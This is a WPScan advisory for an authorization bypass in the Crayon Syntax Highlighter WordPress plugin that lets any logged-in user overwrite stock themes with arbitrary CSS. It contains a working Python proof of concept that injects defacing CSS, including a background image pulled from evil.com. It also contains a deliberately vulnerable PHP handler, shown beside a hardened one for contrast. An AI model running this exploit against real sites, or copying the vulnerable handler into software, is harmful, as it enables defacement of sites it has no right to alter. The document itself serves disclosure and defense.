Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement


Description
The Crayon Syntax Highlighter plugin exposes the AJAX action 'crayon-theme-editor-save' to any registered user, with no capability check. When called, this action invokes the 'save' function of the CrayonThemeEditorWP class, defined in 'crayon-syntax-highlighter/util/theme-editor/theme_editor.php'. Because the user-supplied parameters are trusted by that function, a low-privilege attacker can craft them so that the plugin's stock (base) themes are overwritten with arbitrary CSS, which is then served to visitors of any page that renders the highlighter (defacement).
Proof of Concept
import requests

# Any low-privilege registered account works: the vulnerable AJAX action
# performs no capability check, only a login check.
s = requests.session()
target = 'http://localhost'

# Step 1: authenticate so admin-ajax.php treats us as a logged-in user.
url = '%s/wp-login.php' % target
payload = {
        "log": "test",
        "pwd": "test",
        "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the unprotected 'crayon-theme-editor-save' action. The request
# itself supplies the 'allow_edit' / 'allow_edit_stock_theme' flags, and nothing
# server-side stops the stock 'classic' theme from being overwritten with the
# supplied CSS (here: hide the page body and inject a remote background image).
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
        "action": "crayon-theme-editor-save",
        "id": "classic",
        "name": "Classic",
        "css": "body>*{display:none}\nbody::after{content:'testing'}\nhtml{background-image:url(http://evil.com/myimage.jpg)}",
        "version": "2.6.10",
        "allow_edit": 1,
        "allow_edit_stock_theme": 1
}
r = s.post(url, data=payload)
print(r.status_code, r.text)
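The root cause described above is an admin-ajax handler that is reachable by every logged-in user and that lets the request decide whether a stock theme may be edited. The following is an added illustration, not the plugin's own code and not its 2.7.0 fix: a handler written in the same vulnerable pattern, followed by a hardened version that enforces a capability check, a CSRF nonce, an allow-listed theme id and a server-side stock-theme policy. All function names, option names and the stock theme list beyond 'classic' are assumptions made for the example.

```php
<?php
// Added example (illustrative, not Crayon's code). Assumes it runs inside a
// WordPress plugin file so the WP API (add_action, current_user_can, ...) exists.

// --- VULNERABLE pattern, shown for contrast (deliberately NOT registered) ---
// Reachable by any logged-in user via wp_ajax_*, no nonce, no capability check,
// and the client's own 'allow_edit_stock_theme' flag gates stock-theme writes.
function example_theme_save_vulnerable() {
    $id          = $_POST['id'];
    $css         = $_POST['css'];
    $allow_stock = !empty($_POST['allow_edit_stock_theme']);   // attacker-controlled
    if (!$allow_stock && example_is_stock_theme($id)) {
        wp_die('Stock themes cannot be edited');
    }
    file_put_contents(example_theme_path($id), $css);          // arbitrary CSS lands on disk
    wp_die('saved');
}

// --- HARDENED version: this is the one registered on the AJAX hook ---
add_action('wp_ajax_example-theme-editor-save', 'example_theme_save_hardened');
function example_theme_save_hardened() {
    // 1. Authorisation: only users who may manage the site can write themes.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    // 2. CSRF: the client must send a nonce created with
    //    wp_create_nonce('example_theme_save') in the 'nonce' field.
    check_ajax_referer('example_theme_save', 'nonce');

    // 3. Strict theme id: prevents path tricks like "../../wp-config".
    $id = isset($_POST['id']) ? sanitize_key($_POST['id']) : '';
    if ($id === '' || !preg_match('/^[a-z0-9_-]+$/', $id)) {
        wp_send_json_error('invalid theme id', 400);
    }

    // 4. Policy comes from a server-side option, never from the request.
    if (example_is_stock_theme($id) && !get_option('example_allow_edit_stock_theme', false)) {
        wp_send_json_error('stock themes are read-only', 403);
    }

    // 5. Bound the payload; CSS from an administrator is accepted by design here.
    $css = isset($_POST['css']) ? wp_unslash($_POST['css']) : '';
    if (strlen($css) > 65536) {
        wp_send_json_error('stylesheet too large', 413);
    }
    file_put_contents(example_theme_path($id), $css);
    wp_send_json_success('saved');
}

// Assumed list of stock themes; only 'classic' is named by the advisory.
function example_is_stock_theme($id) {
    return in_array($id, array('classic', 'github', 'monokai'), true);
}

function example_theme_path($id) {
    return plugin_dir_path(__FILE__) . 'themes/' . $id . '/' . $id . '.css';
}
```

With the hardened handler, the PoC request above fails at step 1 with HTTP 403 for a subscriber-level account, and even an administrator's request is rejected without a valid nonce or when the 'classic' theme is protected by the server-side option.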

Affects

Plugin crayon-syntax-highlighter
fixed in version 2.7.0

References

URL https://research.g0blin.co.uk/g0blin-00044/

Classification

Type BYPASS

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 223
Verified No
WPVDB ID 7912

Timeline

Publicly Published 2015-04-20
Added 2015-04-20
Last Updated 2015-05-15

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.